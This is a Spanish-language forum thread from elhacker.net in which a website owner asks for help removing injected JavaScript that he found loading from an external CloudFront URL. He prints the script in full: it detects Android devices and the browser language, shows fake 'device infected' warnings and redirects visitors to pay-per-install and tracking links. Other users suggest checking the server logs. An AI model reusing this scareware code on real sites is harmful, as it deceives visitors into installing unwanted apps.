elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Fallo de seguridad web, incrustacion javascript malicioso
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Fallo de seguridad web, incrustacion javascript malicioso  (Leído 2,749 veces)
oriolrg

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Fallo de seguridad web, incrustacion javascript malicioso
« en: 28 Julio 2015, 17:20 pm »

Buenas, hace unos días me he encontrado con que mi web lanza un mensaje de virus de vez en cuando, al no encontrar ninguno me puse a investigar y descubrí las siguientes lineas de código usando la herramienta de firefox developers.
Estas lineas vienen del siguiente enlace "ht tp s:/ / d 6 vs15m0nt7ly.c l oudfront.net/ test.js"
Llevo días peleandome con esto y no encuentro nada ni googleando, ni la empresa de hosting me da solución, y la verdad no encuentro la fuente de este código para conseguir borrarla.

var ua = navigator.userAgent.toLowerCase();
var isAndroid = ua.indexOf("android") > -1;

var userLang = navigator.language || navigator.userLanguage;
userLang = userLang.toLowerCase();
var isBrazil = userLang.indexOf("pt-br") > -1;
var isRussia = userLang.indexOf("ru") > -1;

if(isAndroid) {
   if (isRussia) {
      if (confirm("Это устройство заражено. Необходимо установить антивирус")) {
         window.top.location.href='http://c.cpl1.ru/8UcC'; // LEO Privacy Guard Ru
      }
   } else if (isBrazil) {
      if (confirm("Este aparelho está infectado. É necessário fazer uma varredura com antivírus.")) {
          window.top.location.href='http://mytrackinglive.net/trkclk/?pid=357&cid=27615';
      }      
   } else {
      if (confirm("This device is infected. You must check it for viruses with antivirus.")) {
          window.top.location.href='http://c.cpl1.ru/8UcB'; // Hola Launcher
      }
   }
}

Muchas gracias si alguien puede ayudarme!.


En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Fallo de seguridad web, incrustacion javascript malicioso
« Respuesta #1 en: 28 Julio 2015, 21:21 pm »

Dijiste cual era a medias el problema...

Mejor explica

Que es lo que quieres y por qué no puedes lograrlo


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
EFEX


Desconectado Desconectado

Mensajes: 1.171


"Dinero Facil"


Ver Perfil WWW
Re: Fallo de seguridad web, incrustacion javascript malicioso
« Respuesta #2 en: 28 Julio 2015, 22:17 pm »

Usa el servicio CDN de Amazon. Podrias denunciarlo, solo redirecciona a publicidades pay per install apps de instal.com parece ser.. pero como dice engel lex, cual es el problema ? no puedes borrarlo ?
En línea

oriolrg

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Fallo de seguridad web, incrustacion javascript malicioso
« Respuesta #3 en: 29 Julio 2015, 09:57 am »

Exacto, el problema es que no consigio borrarlo, ya que no lo encuentro entre los archivos que tengo en el hosting. Me puse en contacto con mi empresa de hosting y su respuesta fue que no tenia ninguna infeccion :-[
Así que el problema es que no consigo sacar-lo...
Muchas gràcias!
En línea

EFEX


Desconectado Desconectado

Mensajes: 1.171


"Dinero Facil"


Ver Perfil WWW
Re: Fallo de seguridad web, incrustacion javascript malicioso
« Respuesta #4 en: 30 Julio 2015, 02:57 am »

Revisa los logs, es un hosting compartido ? o un hosting gratuito(puede que el mismo host lo agrege)?
En línea

oriolrg

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Fallo de seguridad web, incrustacion javascript malicioso
« Respuesta #5 en: 30 Julio 2015, 10:39 am »

Es un hosting de pago, con Cpanel. En los logs que tendria que ver?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Fallo de seguridad en Battle.net
Seguridad
erawlam 1 1,910 Último mensaje 10 Agosto 2012, 13:51 pm
por r32
Los ciberdelincuentes esconden su código malicioso inyectándolo en javascript
Noticias
wolfbcn 0 2,085 Último mensaje 14 Febrero 2013, 02:45 am
por wolfbcn
Incrustación de Videos en Blogger
Multimedia
DavidNK 2 2,267 Último mensaje 13 Abril 2013, 00:46 am
por DavidNK
Viber tiene un fallo de seguridad que pone en peligro la seguridad de los ....
Noticias
wolfbcn 0 1,638 Último mensaje 25 Abril 2013, 18:18 pm
por wolfbcn
javascript seguridad eval
Desarrollo Web
matake 3 2,734 Último mensaje 25 Julio 2016, 03:07 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines